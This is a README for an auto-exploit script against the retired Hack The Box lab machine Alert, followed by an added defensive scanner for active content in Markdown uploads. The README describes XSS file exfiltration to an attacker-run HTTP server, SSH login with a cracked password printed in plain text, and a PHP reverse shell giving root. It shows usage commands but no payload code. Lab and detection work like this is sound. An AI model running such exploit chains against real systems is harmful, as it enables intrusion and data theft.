This script fully automates the exploitation of the retired Hack The Box machine Alert, including both initial intrusion and privilege escalation to root. It leverages a Markdown-based XSS, a local HTTP server, and a PHP reverse shell.
The script operates in two attack phases, selectable via --type-attack:
- intrusion: Uploads a malicious .md file containing JavaScript to extract files from the target via XSS.
- privesc: Uses valid SSH credentials for user albert, deploys a malicious shell.php, and spawns a reverse shell as root.
- Python 3.x
- sshpass and netcat (nc) installed
- HTB VPN connection active
- Known password for albert (retrieved by cracking a hash)
Starts an HTTP server to receive exfiltrated data from the vulnerable application:
python3 autopwn.py --type-attack intrusion --ip 10.10.14.5 --port 8000
Arguments:
- --ip: Your VPN IP to receive the HTTP request
- --port: Listening port for HTTP server (default: 8000)
- --url: Target base URL (default: http://alert.htb)
Once you have cracked albert's password, use this phase to gain a root shell:
python3 autopwn.py --type-attack privesc --ip 10.10.14.5 --ssh-pass manchesterunited
Additional Arguments:
- --ssh-pass: Password for albert (required for privesc)
- --ip-victim: Victim IP address (default: 10.10.11.44)
The script will upload and execute shell.php over SSH and open a listener for the root reverse shell.
# Step 1: XSS intrusion and file exfiltration
python3 autopwn.py --type-attack intrusion --ip 10.10.14.5 --port 8000
# Step 2: After cracking albert’s hash...
python3 autopwn.py --type-attack privesc --ip 10.10.14.5 --ssh-pass manchesterunited
✅ Clean menu with per-phase argument validation
✅ Dynamic JS and PHP payload generation (base64-encoded)
✅ SSH automation with sshpass (no user interaction)
✅ Reverse shell with nc listener spawned from Python
✅ Optional port forwarding functionality built-in (not used in default setup)
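The intrusion phase works only because the application renders JavaScript embedded in an uploaded .md file. The following Python check is an added example, not part of autopwn.py or this project: it flags active content in a Markdown upload before rendering. The name scan_markdown, the tag and attribute lists, and the sample documents are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Raw-HTML tags that run or load active content if the Markdown renderer passes HTML through.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg", "base", "form"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}
# Markdown link/image syntax: [text](target); capture the target.
MD_LINK = re.compile(r"!?\[[^\]]*\]\(\s*<?([^)\s>]+)")

def _bad_scheme(url):
    # Browsers ignore whitespace and control characters inside the scheme.
    cleaned = re.sub(r"[\x00-\x20]", "", url).lower()
    return cleaned.startswith(("javascript:", "vbscript:", "data:text/html"))

class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        line = self.getpos()[0]  # line on which the tag starts
        if tag in ACTIVE_TAGS:
            self.findings.append((line, f"<{tag}> element"))
        for name, value in attrs:  # attribute values arrive entity-decoded
            if name.startswith("on"):  # heuristic: onerror, onload, ...
                self.findings.append((line, f"event handler {name}"))
            elif name in URL_ATTRS and value and _bad_scheme(value):
                self.findings.append((line, f"script URL in {name}"))

def scan_markdown(text):
    """Return sorted (line, reason) findings for active content in a Markdown upload."""
    scanner = _Scanner()
    scanner.feed(text)
    scanner.close()
    findings = list(scanner.findings)
    for lineno, line in enumerate(text.splitlines(), 1):
        for target in MD_LINK.findall(line):
            if _bad_scheme(target):
                findings.append((lineno, "script URL in Markdown link"))
    return sorted(findings)

# Constructed samples, not taken from the machine or from autopwn.py.
BENIGN = "# Notes\n\nSee [docs](https://example.com) and `a < b`.\n"
SUSPECT = ("# Report\n<script>void(0)</script>\n"
           '<img src="x.png" onerror="void(0)">\n'
           "[click](JaVaScript:void(0))\n")
```

This is triage for an upload pipeline, not a sanitizer: it also flags HTML shown inside code fences, and rendering should still go through an allow-list HTML sanitizer with a restrictive Content-Security-Policy.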